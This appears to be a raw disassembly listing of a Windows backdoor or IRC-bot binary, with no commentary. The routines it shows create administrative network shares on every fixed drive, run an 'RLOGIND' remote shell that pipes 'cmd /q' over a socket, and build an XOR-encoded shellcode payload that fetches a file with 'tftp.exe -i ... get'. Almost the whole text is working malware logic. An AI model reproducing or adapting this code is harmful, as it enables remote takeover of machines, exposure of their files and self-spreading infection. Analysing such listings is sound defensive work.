push offset aSecureUnrestri ; "[SECURE]: Unrestricted access to the IP"...
loc_4116E9: ; CODE XREF: sub_4115D4+10E�j
push eax
call sub_416905
pop ecx
pop ecx
push [ebp+var_4]
call dword_43A480 ; RegCloseKey
jmp short loc_411716
; ---------------------------------------------------------------------------
loc_4116FC: ; CODE XREF: sub_4115D4+E3�j
push offset aSecureFailed_6 ; "[SECURE]: Failed to open IPC$ restricti"...
jmp short loc_411708
; ---------------------------------------------------------------------------
loc_411703: ; CODE XREF: sub_4115D4+13�j
push offset aSecureAdvapi32 ; "[SECURE]: Advapi32.dll couldn't be load"...
loc_411708: ; CODE XREF: sub_4115D4+12D�j
lea eax, [ebp+var_220]
push eax
call sub_416905
pop ecx
pop ecx
loc_411716: ; CODE XREF: sub_4115D4+126�j
cmp [ebp+arg_C], ebx
jnz short loc_411735
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_411735: ; CODE XREF: sub_4115D4+145�j
lea eax, [ebp+var_220]
push eax
call sub_401ECD
cmp dword_43A530, ebx
pop ecx
jnz loc_4118A8
push edi
xor esi, esi
mov edi, 200h
loc_411756: ; CODE XREF: sub_4115D4+1EF�j
push dword_430214[esi]
push off_430210[esi]
push ebx
call sub_407BE6
add esp, 0Ch
push off_430210[esi]
test eax, eax
lea eax, [ebp+var_220]
jnz short loc_411782
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_411787
; ---------------------------------------------------------------------------
loc_411782: ; CODE XREF: sub_4115D4+1A5�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_411787: ; CODE XREF: sub_4115D4+1AC�j
push edi
push eax
call sub_416B5D
add esp, 10h
cmp [ebp+arg_C], ebx
jnz short loc_4117B0
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_4117B0: ; CODE XREF: sub_4115D4+1C0�j
lea eax, [ebp+var_220]
push eax
call sub_401ECD
add esi, 8
cmp esi, 10h
pop ecx
jb short loc_411756
call dword_422124 ; GetLogicalDrives
test eax, eax
mov [ebp+var_4], eax
mov bl, 41h
jz loc_411890
loc_4117D8: ; CODE XREF: sub_4115D4+2B6�j
test byte ptr [ebp+var_4], 1
jz loc_411885
cmp bl, 41h
jz loc_411885
movsx esi, bl
push esi
push offset aC_1 ; "%c$"
lea eax, [ebp+var_14]
push 0Ah
push eax
call sub_416B5D
push esi
push offset aC_0 ; "%c:\\"
lea eax, [ebp+var_20]
push 0Ah
push eax
call sub_416B5D
add esp, 20h
lea eax, [ebp+var_20]
push eax
call dword_43A31C ; GetDriveTypeA
cmp eax, 3
jnz short loc_411885
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_14]
push eax
push 0
call sub_407BE6
add esp, 0Ch
test eax, eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_220]
jnz short loc_411849
push offset aSecureShareSAd ; "[SECURE]: Share '%s' added."
jmp short loc_41184E
; ---------------------------------------------------------------------------
loc_411849: ; CODE XREF: sub_4115D4+26C�j
push offset aSecureFailed_7 ; "[SECURE]: Failed to add '%s' share."
loc_41184E: ; CODE XREF: sub_4115D4+273�j
push edi
push eax
call sub_416B5D
add esp, 10h
cmp [ebp+arg_C], 0
jnz short loc_411878
push 1
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_411878: ; CODE XREF: sub_4115D4+288�j
lea eax, [ebp+var_220]
push eax
call sub_401ECD
pop ecx
loc_411885: ; CODE XREF: sub_4115D4+208�j
; sub_4115D4+211�j ...
inc bl
shr [ebp+var_4], 1
jnz loc_4117D8
loc_411890: ; CODE XREF: sub_4115D4+1FE�j
lea eax, [ebp+var_220]
push offset aSecureNetwor_0 ; "[SECURE]: Network shares added."
push eax
call sub_416905
pop ecx
pop ecx
xor ebx, ebx
pop edi
jmp short loc_4118BB
; ---------------------------------------------------------------------------
loc_4118A8: ; CODE XREF: sub_4115D4+174�j
lea eax, [ebp+var_220]
push offset aSecureNetapi32 ; "[SECURE]: Netapi32.dll couldn't be load"...
push eax
call sub_416905
pop ecx
pop ecx
loc_4118BB: ; CODE XREF: sub_4115D4+2D2�j
cmp [ebp+arg_C], ebx
jnz short loc_4118D9
push ebx
push [ebp+arg_8]
lea eax, [ebp+var_220]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
loc_4118D9: ; CODE XREF: sub_4115D4+2EA�j
lea eax, [ebp+var_220]
push eax
call sub_401ECD
pop ecx
xor eax, eax
pop esi
inc eax
pop ebx
leave
retn
sub_4115D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4118ED proc near ; CODE XREF: sub_4118ED+1C�j
; DATA XREF: sub_40FAD0+3B4�o
push 1
push 0
push 0
push 0
call sub_4112AD
add esp, 10h
push dword_43020C
call dword_422000 ; Sleep
jmp short sub_4118ED
sub_4118ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_41190B proc near ; DATA XREF: sub_409806+54BE�o
var_98 = dword ptr -98h
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, [ebp+74h+arg_0]
push esi
push edi
push 26h
pop ecx
mov esi, eax
lea edi, [ebp+74h+var_98]
rep movsd
cmp [ebp+74h+var_10], 0
push [ebp+74h+var_8]
mov dword ptr [eax+94h], 1
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_94]
push eax
push [ebp+74h+var_98]
jz short loc_411949
call sub_4112AD
jmp short loc_41194E
; ---------------------------------------------------------------------------
loc_411949: ; CODE XREF: sub_41190B+35�j
call sub_4115D4
loc_41194E: ; CODE XREF: sub_41190B+3C�j
add esp, 10h
push [ebp+74h+var_14]
call sub_41397A
pop ecx
push 0
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_41190B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411963 proc near ; CODE XREF: sub_411BE1+98�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push esi
push edi
push 11h
xor eax, eax
pop ecx
lea edi, [ebp+var_58]
rep stosd
lea edi, [ebp+var_14]
stosd
xor esi, esi
stosd
stosd
stosd
mov eax, [ebp+arg_0]
mov edi, dword_4220E0
push esi
push 1
mov [ebp+var_20], eax
push 2
lea eax, [ebp+var_18]
push eax
mov [ebp+var_4], esi
mov [ebp+var_58], 44h
mov [ebp+var_54], esi
mov [ebp+var_4C], esi
mov [ebp+var_50], esi
mov [ebp+var_3C], esi
mov [ebp+var_40], esi
mov [ebp+var_44], esi
mov [ebp+var_48], esi
mov [ebp+var_28], si
mov [ebp+var_24], esi
mov [ebp+var_26], si
mov [ebp+var_2C], 101h
mov [ebp+var_1C], ebx
call edi ; GetCurrentProcess
push eax
push ebx
call edi ; GetCurrentProcess
push eax
call dword_422110 ; DuplicateHandle
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push esi
push 1
push esi
push esi
push offset aCmdQ ; "cmd /q"
push esi
call dword_422044 ; CreateProcessA
test eax, eax
jz short loc_411A13
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
imul eax, 234h
push [ebp+var_10]
mov esi, [ebp+var_14]
mov dword_43B248[eax], ecx
call dword_42202C ; CloseHandle
jmp short loc_411A29
; ---------------------------------------------------------------------------
loc_411A13: ; CODE XREF: sub_411963+8E�j
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_2 ; "[RLOGIND]: Failed to execute shell, err"...
call sub_401F41
mov esi, [ebp+var_4]
pop ecx
pop ecx
loc_411A29: ; CODE XREF: sub_411963+AE�j
pop edi
mov eax, esi
pop esi
leave
retn
sub_411963 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411A2F proc near ; DATA XREF: sub_411CDD+3F�o
var_1B0 = byte ptr -1B0h
var_C8 = byte ptr -0C8h
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 1B0h
push ebx
mov ebx, dword_42208C
push esi
push edi
mov edi, [ebp+74h+arg_0]
jmp short loc_411A91
; ---------------------------------------------------------------------------
loc_411A48: ; CODE XREF: sub_411A2F+77�j
xor eax, eax
xor dl, dl
xor esi, esi
cmp [ebp+74h+arg_0], eax
jbe short loc_411A7A
loc_411A53: ; CODE XREF: sub_411A2F+49�j
mov cl, [ebp+esi+74h+var_C8]
cmp cl, 0Ah
jnz short loc_411A6A
cmp dl, 0Dh
jz short loc_411A6A
mov [ebp+eax+74h+var_1B0], 0Dh
inc eax
loc_411A6A: ; CODE XREF: sub_411A2F+2B�j
; sub_411A2F+30�j
mov [ebp+eax+74h+var_1B0], cl
inc eax
inc esi
cmp esi, [ebp+74h+arg_0]
mov dl, cl
jb short loc_411A53
loc_411A7A: ; CODE XREF: sub_411A2F+22�j
push 0
push eax
lea eax, [ebp+74h+var_1B0]
push eax
push dword ptr [edi+0Ch]
call dword_43A438 ; send
test eax, eax
jle short loc_411AA8
loc_411A91: ; CODE XREF: sub_411A2F+17�j
push 0
lea eax, [ebp+74h+arg_0]
push eax
push 0C8h
lea eax, [ebp+74h+var_C8]
push eax
push dword ptr [edi]
call ebx ; ReadFile
test eax, eax
jnz short loc_411A48
loc_411AA8: ; CODE XREF: sub_411A2F+60�j
mov esi, dword_422004
call esi ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_411AC4
call esi ; RtlGetLastWin32Error
push eax
push offset aRlogindSession ; "[RLOGIND]: SessionReadShellThread exite"...
call sub_401F41
pop ecx
pop ecx
loc_411AC4: ; CODE XREF: sub_411A2F+84�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_411A2F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_411ACC proc near ; DATA XREF: sub_411CDD+75�o
var_DC = byte ptr -0DCh
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0DCh
push ebx
push esi
xor ebx, ebx
push edi
mov edi, [ebp+74h+arg_0]
xor esi, esi
mov [ebp+74h+var_10], ebx
jmp loc_411BBE
; ---------------------------------------------------------------------------
loc_411AE9: ; CODE XREF: sub_411ACC+107�j
cmp [ebp+74h+var_10], ebx
jbe short loc_411AF6
dec [ebp+74h+var_10]
jmp loc_411BC1
; ---------------------------------------------------------------------------
loc_411AF6: ; CODE XREF: sub_411ACC+20�j
mov al, byte ptr [ebp+74h+arg_0+3]
movsx ecx, al
cmp ecx, 0FFh
jz loc_411BA9
cmp al, 8
mov [ebp+74h+var_C], ebx
jz short loc_411B60
cmp al, 7Fh
jz short loc_411B60
cmp al, 3
jnz short loc_411B21
push ebx
push ebx
call dword_422128 ; GenerateConsoleCtrlEvent
jmp short loc_411B87
; ---------------------------------------------------------------------------
loc_411B21: ; CODE XREF: sub_411ACC+49�j
cmp al, 15h
jnz short loc_411B43
xor esi, esi
mov [ebp+74h+var_8], 20h
mov [ebp+74h+var_7], 58h
mov [ebp+74h+var_6], 58h
mov [ebp+74h+var_5], 58h
mov [ebp+74h+var_4], 0Dh
mov [ebp+74h+var_3], 0Ah
push 6
jmp short loc_411B73
; ---------------------------------------------------------------------------
loc_411B43: ; CODE XREF: sub_411ACC+57�j
xor ecx, ecx
mov [ebp+esi+74h+var_DC], al
inc esi
inc ecx
cmp al, 0Dh
mov [ebp+74h+var_8], al
jnz short loc_411B74
mov [ebp+esi+74h+var_DC], 0Ah
mov [ebp+74h+var_7], 0Ah
inc esi
push 2
jmp short loc_411B73
; ---------------------------------------------------------------------------
loc_411B60: ; CODE XREF: sub_411ACC+41�j
; sub_411ACC+45�j
cmp esi, ebx
jbe short loc_411B8A
dec esi
mov [ebp+74h+var_8], 8
mov [ebp+74h+var_7], 20h
mov [ebp+74h+var_6], 8
push 3
loc_411B73: ; CODE XREF: sub_411ACC+75�j
; sub_411ACC+92�j
pop ecx
loc_411B74: ; CODE XREF: sub_411ACC+84�j
push ebx
push ecx
lea eax, [ebp+74h+var_8]
push eax
push dword ptr [edi+0Ch]
call dword_43A438 ; send
test eax, eax
jle short loc_411BD9
loc_411B87: ; CODE XREF: sub_411ACC+53�j
mov al, byte ptr [ebp+74h+arg_0+3]
loc_411B8A: ; CODE XREF: sub_411ACC+96�j
cmp al, 0Dh
jnz short loc_411BC1
push ebx
lea eax, [ebp+74h+var_14]
push eax
push esi
lea eax, [ebp+74h+var_DC]
push eax
push dword ptr [edi+4]
call dword_422030 ; WriteFile
test eax, eax
jz short loc_411BD9
xor esi, esi
jmp short loc_411BC1
; ---------------------------------------------------------------------------
loc_411BA9: ; CODE XREF: sub_411ACC+36�j
cmp [ebp+74h+var_C], ebx
jnz short loc_411BB7
mov [ebp+74h+var_C], 1
jmp short loc_411BC1
; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: sub_411ACC+E0�j
mov [ebp+74h+var_10], 0Ah
loc_411BBE: ; CODE XREF: sub_411ACC+18�j
mov [ebp+74h+var_C], ebx
loc_411BC1: ; CODE XREF: sub_411ACC+25�j
; sub_411ACC+C0�j ...
push ebx
push 1
lea eax, [ebp+74h+arg_0+3]
push eax
push dword ptr [edi+0Ch]
call dword_43A304 ; recv
test eax, eax
jg loc_411AE9
loc_411BD9: ; CODE XREF: sub_411ACC+B9�j
; sub_411ACC+D7�j
pop edi
pop esi
pop ebx
add ebp, 74h
leave
retn
sub_411ACC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BE1 proc near ; CODE XREF: sub_411CDD+D�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
xor edi, edi
push 18h
mov [ebp+var_4], edi
mov [ebp+var_8], edi
call sub_416DAF
mov esi, eax
cmp esi, edi
pop ecx
jnz short loc_411C06
xor eax, eax
jmp loc_411CD9
; ---------------------------------------------------------------------------
loc_411C06: ; CODE XREF: sub_411BE1+1C�j
push ebx
push edi
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_8]
mov [esi], edi
push eax
lea ebx, [esi+4]
mov [ebx], edi
push esi
mov [ebp+var_14], 0Ch
mov [ebp+var_10], edi
mov [ebp+var_C], 1
call dword_422114 ; CreatePipe
test eax, eax
mov edi, dword_42202C
jnz short loc_411C47
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_3 ; "[RLOGIND]: Failed to create shell stdou"...
jmp short loc_411C68
; ---------------------------------------------------------------------------
loc_411C47: ; CODE XREF: sub_411BE1+56�j
push 0
lea eax, [ebp+var_14]
push eax
push ebx
lea eax, [ebp+var_4]
push eax
call dword_422114 ; CreatePipe
test eax, eax
jnz short loc_411C70
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_4 ; "[RLOGIND]: Failed to create shell stdin"...
loc_411C68: ; CODE XREF: sub_411BE1+64�j
call sub_401F41
pop ecx
jmp short loc_411C9D
; ---------------------------------------------------------------------------
loc_411C70: ; CODE XREF: sub_411BE1+79�j
push [ebp+arg_0]
mov ebx, [ebp+var_8]
push [ebp+var_4]
call sub_411963
pop ecx
pop ecx
mov [esi+8], eax
push [ebp+var_4]
call edi ; CloseHandle
push [ebp+var_8]
call edi ; CloseHandle
cmp dword ptr [esi+8], 0
jnz short loc_411CD2
push offset aRlogindFaile_5 ; "[RLOGIND]: Failed to execute shell."
call sub_401ECD
loc_411C9D: ; CODE XREF: sub_411BE1+8D�j
cmp [ebp+var_4], 0
pop ecx
jz short loc_411CA9
push [ebp+var_4]
call edi ; CloseHandle
loc_411CA9: ; CODE XREF: sub_411BE1+C1�j
cmp [ebp+var_8], 0
jz short loc_411CB4
push [ebp+var_8]
call edi ; CloseHandle
loc_411CB4: ; CODE XREF: sub_411BE1+CC�j
mov eax, [esi]
test eax, eax
jz short loc_411CBD
push eax
call edi ; CloseHandle
loc_411CBD: ; CODE XREF: sub_411BE1+D7�j
mov eax, [esi+4]
test eax, eax
jz short loc_411CC7
push eax
call edi ; CloseHandle
loc_411CC7: ; CODE XREF: sub_411BE1+E1�j
push esi
call sub_416C97
pop ecx
xor eax, eax
jmp short loc_411CD8
; ---------------------------------------------------------------------------
loc_411CD2: ; CODE XREF: sub_411BE1+B0�j
or dword ptr [esi+0Ch], 0FFFFFFFFh
mov eax, esi
loc_411CD8: ; CODE XREF: sub_411BE1+EF�j
pop ebx
loc_411CD9: ; CODE XREF: sub_411BE1+20�j
pop edi
pop esi
leave
retn
sub_411BE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411CDD proc near ; CODE XREF: sub_4108F4+1BC�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push edi
call sub_411BE1
imul edi, 234h
mov esi, eax
mov eax, dword_43B24C[edi]
mov edi, dword_422008
xor ebx, ebx
pop ecx
mov [ebp+var_C], 0Ch
mov [ebp+var_8], ebx
mov [ebp+var_4], ebx
mov [esi+0Ch], eax
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411A2F
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+10h], eax
jnz short loc_411D4C
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401F41
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
xor eax, eax
jmp loc_411E2C
; ---------------------------------------------------------------------------
loc_411D4C: ; CODE XREF: sub_411CDD+50�j
lea eax, [ebp+arg_0]
push eax
push ebx
push esi
push offset sub_411ACC
push ebx
lea eax, [ebp+var_C]
push eax
call edi ; CreateThread
cmp eax, ebx
mov [esi+14h], eax
jnz short loc_411D8D
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindFaile_6 ; "[RLOGIND]: Failed to create ReadShell s"...
call sub_401F41
or dword ptr [esi+0Ch], 0FFFFFFFFh
pop ecx
pop ecx
push ebx
push dword ptr [esi+14h]
call dword_4220F0 ; TerminateThread
xor eax, eax
jmp loc_411E2D
; ---------------------------------------------------------------------------
loc_411D8D: ; CODE XREF: sub_411CDD+86�j
mov eax, [esi+10h]
mov [ebp+var_18], eax
mov eax, [esi+14h]
mov [ebp+var_14], eax
mov eax, [esi+8]
push 0FFFFFFFFh
mov [ebp+var_10], eax
push ebx
lea eax, [ebp+var_18]
push eax
push 3
call dword_42212C ; WaitForMultipleObjects
sub eax, ebx
jz short loc_411DE7
dec eax
jz short loc_411DE1
dec eax
jz short loc_411DCD
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aRlogindWaitfor ; "[RLOGIND]: WaitForMultipleObjects error"...
call sub_401F41
pop ecx
pop ecx
jmp short loc_411DFC
; ---------------------------------------------------------------------------
loc_411DCD: ; CODE XREF: sub_411CDD+D9�j
mov edi, dword_4220F0
push ebx
push dword ptr [esi+14h]
call edi ; TerminateThread
push ebx
push dword ptr [esi+10h]
call edi ; TerminateThread
jmp short loc_411DFC
; ---------------------------------------------------------------------------
loc_411DE1: ; CODE XREF: sub_411CDD+D6�j
push ebx
push dword ptr [esi+10h]
jmp short loc_411DEB
; ---------------------------------------------------------------------------
loc_411DE7: ; CODE XREF: sub_411CDD+D3�j
push ebx
push dword ptr [esi+14h]
loc_411DEB: ; CODE XREF: sub_411CDD+108�j
call dword_4220F0 ; TerminateThread
push 1
push dword ptr [esi+8]
call dword_4220E8 ; TerminateProcess
loc_411DFC: ; CODE XREF: sub_411CDD+EE�j
; sub_411CDD+102�j
push dword ptr [esi+10h]
mov edi, dword_42202C
call edi ; CloseHandle
push dword ptr [esi+14h]
call edi ; CloseHandle
push dword ptr [esi+8]
call edi ; CloseHandle
push dword ptr [esi]
call edi ; CloseHandle
push dword ptr [esi+4]
call edi ; CloseHandle
push dword ptr [esi+0Ch]
call dword_43A4B0 ; closesocket
push esi
call sub_416C97
xor eax, eax
inc eax
loc_411E2C: ; CODE XREF: sub_411CDD+6A�j
pop ecx
loc_411E2D: ; CODE XREF: sub_411CDD+AB�j
pop edi
pop esi
pop ebx
leave
retn
sub_411CDD endp
; =============== S U B R O U T I N E =======================================
sub_411E32 proc near ; CODE XREF: sub_411E5E+A�p
; sub_412061+8�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
lea edx, [eax+1]
loc_411E39: ; CODE XREF: sub_411E32+C�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411E39
sub eax, edx
push esi
mov esi, eax
mov eax, [esp+4+arg_4]
lea ecx, [eax+1]
loc_411E4C: ; CODE XREF: sub_411E32+1F�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_411E4C
sub eax, ecx
lea eax, [esi+eax*2+0C1h]
pop esi
retn
sub_411E32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411E5E proc near ; CODE XREF: sub_412078+49�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_C]
push [ebp+arg_8]
call sub_411E32
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
mov [ebp+var_4], eax
jbe short loc_411E7B
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_411E7B: ; CODE XREF: sub_411E5E+17�j
mov eax, [ebp+arg_8]
lea edx, [eax+1]
loc_411E81: ; CODE XREF: sub_411E5E+28�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411E81
sub eax, edx
push ebx
mov edx, eax
mov eax, [ebp+arg_C]
push esi
push edi
mov [ebp+arg_4], edx
lea esi, [eax+1]
loc_411E98: ; CODE XREF: sub_411E5E+3F�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_411E98
sub eax, esi
mov ebx, [ebp+arg_0]
lea ecx, [eax+edx+12h]
mov dword_4302C4, ecx
push 0FFFFFFEDh
lea ecx, [eax+1]
mov dword_4302E5, ecx
lea ecx, [eax+17h]
mov dword_4302DD, ecx
pop ecx
sub ecx, eax
mov dword_4302F3, ecx
push 1Dh
pop ecx
mov edi, ebx
mov esi, offset dword_430260
rep movsd
mov esi, [ebp+arg_8]
mov ecx, edx
shr ecx, 2
lea edi, [ebx+74h]
rep movsd
mov ecx, edx
mov edx, [ebp+arg_4]
and ecx, 3
rep movsb
add edx, 74h
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+0Ch)
movsd
movsb
mov esi, [ebp+arg_C]
add edx, 5
lea edi, [edx+ebx]
mov ecx, eax
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
mov ebx, [ebp+arg_0]
and ecx, 3
rep movsb
add edx, eax
lea edi, [edx+ebx]
mov esi, (offset aTftp_exeIGet+11h)
movsd
movsd
movsd
movsd
mov esi, [ebp+arg_C]
add edx, 10h
mov ecx, eax
lea edi, [edx+ebx]
mov ebx, ecx
shr ecx, 2
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
push 0Eh
lea edi, [edx+eax]
add edi, [ebp+arg_0]
mov eax, [ebp+var_4]
pop ecx
mov esi, offset byte_4302E9
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_411E5E endp
; =============== S U B R O U T I N E =======================================
sub_411F56 proc near ; CODE XREF: sub_411F71+41�p
; sub_412061+E�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test cl, cl
jnz short loc_411F5F
inc ecx
loc_411F5F: ; CODE XREF: sub_411F56+6�j
mov eax, 0FFh
cmp eax, ecx
sbb eax, eax
and eax, 2
add eax, 15h
add eax, ecx
retn
sub_411F56 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411F71 proc near ; CODE XREF: sub_412078+56�p
; .text:0041490B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_C]
cmp bl, 0Ah
push esi
jz short loc_411F8C
cmp bl, 0Dh
jz short loc_411F8C
cmp bl, 5Ch
jz short loc_411F8C
test bl, bl
jnz short loc_411F8D
loc_411F8C: ; CODE XREF: sub_411F71+B�j
; sub_411F71+10�j ...
inc ebx
loc_411F8D: ; CODE XREF: sub_411F71+19�j
mov esi, 0FFh
cmp ebx, esi
jbe short loc_411FB1
mov eax, ebx
shr eax, 8
cmp al, 0Ah
jz short loc_411FAB
cmp al, 0Dh
jz short loc_411FAB
cmp al, 5Ch
jz short loc_411FAB
test al, al
jnz short loc_411FB1
loc_411FAB: ; CODE XREF: sub_411F71+2C�j
; sub_411F71+30�j ...
add ebx, 100h
loc_411FB1: ; CODE XREF: sub_411F71+23�j
; sub_411F71+38�j
push ebx
call sub_411F56
cmp eax, [ebp+arg_4]
pop ecx
mov [ebp+arg_C], eax
ja short loc_411FC7
cmp eax, 0FFFFh
jbe short loc_411FCE
loc_411FC7: ; CODE XREF: sub_411F71+4D�j
xor eax, eax
jmp loc_41205D
; ---------------------------------------------------------------------------
loc_411FCE: ; CODE XREF: sub_411F71+54�j
mov dl, byte_480D20
xor eax, eax
test ebx, ebx
jbe short loc_411FFC
loc_411FDA: ; CODE XREF: sub_411F71+89�j
mov ecx, [ebp+arg_8]
mov cl, [eax+ecx]
xor cl, dl
jz short loc_411FF3
cmp cl, 0Ah
jz short loc_411FF3
cmp cl, 0Dh
jz short loc_411FF3
cmp cl, 5Ch
jnz short loc_411FF7
loc_411FF3: ; CODE XREF: sub_411F71+71�j
; sub_411F71+76�j ...
inc dl
xor eax, eax
loc_411FF7: ; CODE XREF: sub_411F71+80�j
inc eax
cmp eax, ebx
jb short loc_411FDA
loc_411FFC: ; CODE XREF: sub_411F71+67�j
cmp ebx, esi
push edi
mov edi, [ebp+arg_0]
push 5
mov byte_480D20, dl
pop ecx
ja short loc_412024
mov esi, offset loc_430248
mov byte_430255, bl
mov byte_430259, dl
rep movsd
push 15h
jmp short loc_41203C
; ---------------------------------------------------------------------------
loc_412024: ; CODE XREF: sub_411F71+9A�j
mov word_43023E, bx
mov byte_430243, dl
mov esi, offset loc_430230
rep movsd
movsw
push 17h
loc_41203C: ; CODE XREF: sub_411F71+B1�j
pop eax
xor ecx, ecx
test ebx, ebx
movsb
pop edi
jbe short loc_41205A
mov esi, [ebp+arg_0]
add esi, eax
loc_41204A: ; CODE XREF: sub_411F71+E7�j
mov eax, [ebp+arg_8]
mov al, [ecx+eax]
xor al, dl
mov [esi+ecx], al
inc ecx
cmp ecx, ebx
jb short loc_41204A
loc_41205A: ; CODE XREF: sub_411F71+D2�j
mov eax, [ebp+arg_C]
loc_41205D: ; CODE XREF: sub_411F71+58�j
pop esi
pop ebx
pop ebp
retn
sub_411F71 endp
; =============== S U B R O U T I N E =======================================
sub_412061 proc near ; CODE XREF: sub_412078+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_411E32
push eax
call sub_411F56
add esp, 0Ch
retn
sub_412061 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412078 proc near ; CODE XREF: sub_413C0C+6D�p
; sub_4142AE+30�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_8]
push edi
mov edi, [ebp+arg_C]
push edi
push ebx
call sub_412061
cmp eax, [ebp+arg_4]
pop ecx
pop ecx
ja short loc_412098
cmp eax, 0FFFFh
jbe short loc_41209C
loc_412098: ; CODE XREF: sub_412078+17�j
xor eax, eax
jmp short loc_4120E1
; ---------------------------------------------------------------------------
loc_41209C: ; CODE XREF: sub_412078+1E�j
push esi
push edi
push ebx
call sub_411E32
add eax, 101h
push eax
call sub_416DAF
add esp, 0Ch
push edi
push ebx
push edi
push ebx
mov esi, eax
call sub_411E32
pop ecx
pop ecx
push eax
push esi
call sub_411E5E
push eax
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call sub_411F71
push esi
mov edi, eax
call sub_416C97
add esp, 24h
mov eax, edi
pop esi
